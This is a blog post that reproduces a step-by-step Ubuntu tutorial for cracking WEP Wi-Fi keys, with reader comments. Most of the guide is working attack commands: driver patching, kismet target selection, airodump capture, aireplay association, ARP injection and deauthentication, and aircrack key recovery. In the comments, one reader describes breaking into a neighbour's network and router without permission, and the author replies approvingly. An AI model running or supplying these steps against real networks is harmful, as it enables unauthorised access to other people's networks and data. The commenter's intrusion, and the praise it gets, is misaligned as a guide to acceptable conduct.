I was sent a great URL yesterday, that (in essence) was a hands-on guide to cracking WEP. Personally I question the ethics of such activities, however I’d also like to learn how this is done, so that I might further enhance the wifi security here. I’d like to adapt this to Feisty or Gutsy, so will be interesting to see new versions and how they stack up against those in the guide. Below is the actual guide from the original author (listed below):
This post should enable anyone to get Linux up and running and crack a WEP key. It took me about 2 days and myriad tutorials to finally get this to work, and now that I have I feel that I should share it with everyone. I am by no means a Linux expert, but this works regardless. All you need is a old laptop with a wireless card and a copy of Ubuntu Linux, currently one of the most popular and easily installed distributions of linux. If you haven’t already bought a wireless card, you should select one from this list to save yourself some trouble.
First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. This should be fairly straightforward and I’m not going to get into it any more than this. Once you have it installed and the layout and theme is how you want it, go on. But do everything in order, because otherwise it won’t really work.
Next step is to install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your box can connect to the internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list
While in the editor, replace everything with:
## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
Save the file and exit the text editor. Next type the command:
sudo apt-get update
Now we have to install the packages we’ll need later on:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.
This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.
Let’s apply the madwifi patch which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers of the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself.
sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patchifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make installmodprobe ath_pci
UPDATE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:
However, during Madwifi Installation I got this warning:
Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o
This warning can be IGNORED.
When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.
I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!
Karl, maybe you can add this to your tutorial cuz I did everything exactly as you wrote. Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricdet-modules.
Thanks again!
Cheers,
mcgyver100
If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.
sudo gedit /etc/kismet/kismet.conf
Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.
Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.
sudo airmon start ath0
sudo kismet
Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.
Next, run airodump.
sudo airodump ath0 filename channel# 1
The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.
Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.
Next we want to start injecting packets.
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:
sudo aireplay -0 ath0 -a BSSID ath0
Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack.
sudo aircrack filename.ivs
After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.
Published under a Creative Commons license by Karl Blitz
Update: Looking for compatible WiFi cards? Read here: http://ubuntulinuxhelp.com/how-to-setup-a-wireless-ubuntu-router/
Update: The locations of some packages have changed! Please see the comments section below to find where the packages are. Thanks.
Loading ...
There are 21 comment(s) added so far...
Would also be nice if there were a list of wifi cards that work with Ubuntu. Anyone have one?
Try reading this: http://ubuntulinuxhelp.com/how-to-setup-a-wireless-ubuntu-router/ and find this link (in that article): https://help.ubuntu.com/community/WifiDocs/WirelessCardsSupported
Another list here: http://aircrack-ng.org/doku.php?id=compatible_cards&s=best%20card%20buy
Also…
WiFi Radar Feisty:
http://packages.ubuntu.com/feisty/net/wifi-radar
WiFi Radar Gutsy:
http://packages.ubuntu.com/gutsy/net/wifi-radar
WiFi Radar Hardy:
http://packages.ubuntu.com/hardy/net/wifi-radar
I don’t see anything for Intrepid yet.
[…] of the readers of another post “Using Ubuntu to Crack WEP“, sent me this […]
thanks for posting this tutorial, im very new to ubuntu linux but i was keen to learn how to crack wepcodes. however i have encountered an issue. whe i type the command
sudo mousepad /etc/kismet/kismet.conf
it opens mousepad, but the only text in the document says “warning, you are using the root account and this may harm your system”
so i cannot edit the file.
i have to use mousepad rather than Gedit because im running ubuntu on an eeepc and it runs much better.
i would be grateful for any help you could provide and i look forward tohearing back from you soon.
Sam
another issue that i have encountered is that neither of the links to the madwifi patches and packages work, could you prvide more up to date links?
thanks again,
Sam
@Sam - Thanks for letting me know.
The files are now here:
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz
So…
Instead of:
madwifi-cvs-20051025.tar.gz
madwifi-cvs-20051025.patch
Use…
madwifi-ng-r1679-20060707.tar.gz
madwifi-ng-r1679.patch
@Sam - The warning command tells you that you are operating with administrative rights and therefore can edit files with those administrative rights. If you make a mistake or edit something that can damage your installation, you will be able to do that… Because you are doing so with full administrative rights. You can use all sorts of editors like vi, nano, etc. It does not have to be gedit.
I have often broken my system doing such things, so please be careful that you don’t do anything to break yours. The guide was posted as a learning tool. Therefore do NOT use it to do anything ethically wrong or illegal. I used it to crack my own WEP code and to show people why they should use stronger encryption (like WPA, etc.) and not use WEP.
Could this guide be upgrades for Ubuntu 8.04 please? That repository isn’t available, and some programs are missing from the current ones…
@Vadim P. - Are you able to tell me which ones are missing? I might be able to track them down. Also, if you happen to be looking for:
madwifi-ng-r1679-20060707.tar.gz
madwifi-ng-r1679.patch
They are here:
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz
I’m on some intel card, so I don’t think I need the wifi patch. Just want to see if my card can do this to begin with
The missing program is “airsnort”, which I think is responsible for airmon and airodump, and I can’t run those commands.
@Vadim P. - Oh I see, okay, I will look later, but a quick link here: http://linux.softpedia.com/get/System/Monitoring/AirSnort-3454.shtml
Would compiling it help?
It has a quick blurb on that page about how to compile.
(I’ll look later anyway).
Thanks.
[…] Among some of the features I think especially nice are backward compatibility with some of the command line tools (ifconfig for example), the ability to automatically connect at boot to accessible wifi networks and WPA support. As a side note… if some of you don’t thing WPA is pertinent, please read: Don’t WEP Me! Ubuntu (and Others) Are Safer With WPA. or Using Ubuntu to Crack WEP. […]
For people having trouble with these commands on Hardy, all the commands listed here that start with “air” are part of the aircrack-ng package. As for wifiradar, it’s actually called wifi-radar in the repos. I don’t know about madwifi, I didn’t need it.
Thanks for the tut, using this was loads of fun. I kept telling my neighbor who works a lot from home that WEP is insecure, but he’d rather take his stupid tech guy’s word that it can’t be broken by current technology (d’oh!) so I grabbed his WEP key, accessed his router config and changed the ESSID to “insecure network”. That scared him into changing his encryption to WPA-PSK
I guess it was an illegal invasion since I didn’t get his permission (or even warn him), but it was all for the greater good, and it was really fun. Obviously I didn’t do anything to hurt his files or exploit his network.
I must be doing something wrong, but I can’t see what it is. Even after one hour of running aireplay, airodump has still connected only 11 packets from my AP, and aireplay shows 0 ARP, 0 ACK and 0 packets sent. What gives?
@Paulo - It that wireless card working properly? Are there any wireless networks in range?
@Gepetto - Well… that’s one way to show someone the truth of the matter!
For those who are interested in madwifi on Hardy (8.04), the info is here: https://help.ubuntu.com/community/WifiDocs/Driver/Madwifi#head-2a72fa3e31e1b7509b7b21bb1e2bdce8ee5ac782
I had fun playing too, so figured I’d post notes - That way I, or anyone, can come back later to refer to them.
Thanks but I already figured out the problem. Turns out this method only works when there’s another client connected to the network. There’s a tutorial on aircrack-ng.org for obtaining a PRGA and cracking the network even without connected clients: http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
It’s the same method with a few extra steps in the beginning. Worked like a charm.
do you plan on updating this tutorial for hardy? please let me know
@stephen - I’d like to update it; maybe after the LAMP server series is finished. (Timing is a bit tight right now). If you have some input, feel free to let me know.
Thanks!